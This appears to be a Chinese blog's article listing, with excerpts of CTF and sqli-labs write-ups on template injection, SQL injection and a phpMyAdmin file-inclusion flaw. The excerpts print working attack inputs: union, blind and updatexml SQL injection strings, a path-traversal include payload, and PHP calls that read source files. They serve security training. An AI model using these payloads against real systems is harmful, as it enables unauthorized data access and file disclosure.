- 博客(10)
- 资源 (9)
- 收藏
- 关注
原创 CTF模板注入
模板注入赛题1. [护网杯 2018]easy_tornado进入后三个链接/flag.txt # flag in /fllllllllllllag/welcome.txt #提示render(渲染)/hint.txt #提示md5(cookie_secret+md5(filename))url上两个参数:filename&filehash根据提示,要查看flag,已经知道了文件名,filehash也知道了构
2020-07-30 01:04:07 4240
原创 [BUUCTF][GYCTF2020]Ezsqli
[GYCTF2020]Ezsqli布尔盲注无列名盲注抓包,存在post的id参数。进行测试id=1时, :Nu1Lid=0时, :Error Occured When Fetch Result.id=1’时, :bool(false)id=1’#时,:bool(false)语句不正确时返回bool(false)所以猜测是数字型的注入id=1^1 :Error Occured When Fetch Result.id=1^0 :Nu1L存在sql注入。
2020-07-26 03:31:58 2638
原创 [buuctf][RCTF2015]EasySQL
[RCTF2015]EasySQL进去后是个登陆框,可以注册用户。首先这种猜测是二次注入,注册了admin’#用户,进去后有个改密码的操作,更加坚信了是个二次注入,但是并没有起到效果。因为并不清楚sql语句的闭合方式,所以重新注册一个admin"#,登陆后也没有起到作用。注册admin\,登陆进去后修改密码,结果出现报错。可以看到原语句中的username是双引号闭合的,所以单引号注册的账号是不起作用的.由此推断,我们注册admin"#因为闭合语句且将后面进行了注释,所以是可以sql语句会变为
2020-07-26 00:49:41 1094
原创 sqli_labs(11-20)练习
POST注入less11post类型一个登陆框试一下万能密码:uname=admin’ or ‘1’='1–+&passwd=1显示出Your Login name:adminYour Password:admin所以猜测sql语句是:$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";注入如下(同对id的注入方法):u..
2020-07-22 01:16:16 280
原创 sqli_lab(less1-10)解题方法
GET注入less1:?id=1’ #报错?id=1’ and 1=1–+ #正常 ?id=1’ and 1=2–+ #语句正常但返回异常?id=1’ order by 3–+ #正常?id=-1’ union select 1,2,3–+ #2为显示位?id=-1’ union select 1,group_concat(schema_name),3, from information_schema.schemata–+?id=-1’
2020-07-19 00:30:44 389
原创 [BUUCTF刷题]HardSQL
HardSQL进入后是sql注入页面,过滤了一些字符,先进行fuzz测试。发现过滤了union,双写也无法绕过,所以不能使用常规的方法进行注入。但发现没有过滤extractvalue和updatexml。也过滤了空格,使用括号绕过。首先,注数据库名称username=admin'or(updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1))%23&password=1然后得到表名(过滤=,使用like)userna
2020-07-03 00:29:42 2063
原创 [BUUCTF刷题]我有一个数据库
我有一个数据库cve-2018-12613-PhpMyadmin后台文件包含进去后出现乱码的文字,扫描目录发现/phpmyadmin发现其版本为phpmyadmin4.18,搜索相关版本的漏洞。利用poctarget=db_datadict.php%253f/../../../../../../../../flag漏洞分析:问题在index.php的55~63:// If we have a valid target, let's load that script instead
2020-07-02 22:57:41 1261
原创 buuctf_[CISCN2019 华北赛区 Day2 Web1]Hack World
Hack World进入后提示是sql注入,并且给了表和列名。进行fuzz测试,过滤了很多字符。主要的union字符被过滤,但select,from没有被过滤。我们还发现id只有输入1,2时分别返回Hello, glzjin wants a girlfriend.,Do you want to be my girlfriend?。并且支持异或判断。所以可以进行布尔盲注读取数据。id=0^(ascii(substr((select(flag)from(flag)),1,1))>
2020-07-02 16:24:58 834
原创 buuctf_安洵杯 2019_easy_web
安洵杯 2019_easy_web进入后页面显示如下查看源代码:发现一长串base64编码的数据,然后进行解码发现是png图片的内容信息。地址.../index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=对TXpVek5UTTFNbVUzTURabE5qYz0进行两次base64解密,一次hex2bin解密得到555.png。想必上面显示的那张图片就是555.png,然后源代码里面显示的数据就是该图片的内容,即在参数img中输入一次he
2020-07-01 23:09:27 1469 1
原创 [BUUCTF刷题]禁止套娃
禁止套娃exp=show_source(next(array_reverse(scandir(pos(localeconv())))));exp=show_source(array_rand(array_flip(scandir(pos(localeconv())))));exp=show_source(session_id(session_start()));进入后显示flag在哪儿,找不到线索,进行目录扫描。但也没有扫到。查看别人的wp发现是.git泄露。但是自己的网址下/.git
2020-07-01 16:48:09 2183
java网络画板.zip
2020-06-17
C语言课程设计报告医院专家门诊挂号系统.doc
2020-06-17
java 网络绘画板
2020-06-17
C语言课程设计 菜农种植系统2017
2020-06-17
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人